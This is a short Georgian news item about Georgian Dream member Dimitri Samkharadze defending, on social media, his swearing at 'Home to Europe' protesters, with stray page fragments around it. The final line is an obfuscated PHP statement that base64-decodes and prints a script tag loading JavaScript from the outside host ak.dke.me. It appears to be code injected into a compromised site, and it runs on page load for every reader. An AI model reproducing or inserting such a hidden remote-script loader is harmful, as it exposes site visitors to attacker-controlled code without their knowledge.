celsiusi
ავერსი შნაიდერი
"ქართული ოცნების" წევრი, დიმიტრი სამხარაძე აქციის მონაწილეების მიმართ მისივე გინებას ეხმაურება და სოციალურ ქსელში წერს - " ჩემი გინების ადრესატს გაცილებით მეტი ეკუთვნის".
 
"პირდაპირ ვიტყვი, რომ ჩემი გინების ადრესატს გაცილებით მეტი ეკუთვნის და ყოველთვის ეს განწყობა მექნება მკვლელების რეჟიმის ლიდერის თუ ლიდერების მიმართ, რომელსაც ჩემი ქვეყნის წალეკვა აქვთ გადაწყვეტილი, თუმცა მართლა უკაცრავად საზოგადოებასთან, რომელსაც ჩემი გინების მოსმენა მოუწია", - წერს დიმიტრი სამხარაძე.
 
სამხარაძემ, გუშინ, 3 ივლისს ქართული ოცნების ოფისიდან "შინ ევროპისკენ" აქციის მონაწილეებს აგინა.
852
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");